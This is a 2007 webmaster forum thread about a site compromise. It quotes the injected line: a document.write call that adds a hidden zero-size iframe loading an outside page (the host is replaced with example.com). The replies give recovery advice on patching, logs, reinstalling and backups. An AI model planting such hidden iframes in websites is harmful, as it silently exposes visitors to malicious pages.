Welcome to WebmasterWorld Guest from 220.127.116.11
Forum Moderators: phranque
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://example.com/index.htm" frameBorder=0 width=0 scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');
So when a visitor try of open their site, it was looking for many junk sites.
I removed the entry and now it is working fine...
But how they are getting in to the site..? what shd i do to prevent this?
[edited by: tedster at 7:28 pm (utc) on Feb. 24, 2007]
[edit reason] use example.com [/edit]
Is your server up to date with security patches?
If you're on shared hosting, could other users of the server have accessed your site?
Have you checked any log files?
Do you know exactly when this happened - what were the timestamps on the modified files? Have you reported this unauthorised access to your host?
Could your own computer be compromised? Checked for trojans/rootkits recently?
[edited by: tedster at 7:27 pm (utc) on Feb. 24, 2007]
Thanks a lot for the reply...
Actually the client has a tech team and they are maintaining it but they are technically not very sound so they contacted me to solve this problem...
Site is a windows dedicated server hosted with hostway.
I told them to change the password.. i think their local machines are not secure... virus scanners installed but they were not even aware about spywares... i told them to check with spywhere checker and install zonealam in every machines..
They removed the added entry on Friday but today again somebody added same kind of code in another js file. it seems like they still have the control. right?
it seems like they still have the control. right?
If it was my server I'd pull the plug, reinstall from scratch, **PATCH** with all relevant updates (are they patching their server at the moment?), reinstall anti-virus, anti-spyware, **UPDATE** these, then restore data from backups.
You do have backups, right? :-)
Thank you for the reply... yes you are right..
i have a vps and with the help of the hosting people i make everything up to date..
But their tech team is not capable of doing every thing.. they dont know many things.. I am working as a consultant to help them only in seo works..
i told them to change the root password, check for spyware and virus
They said they have full backup...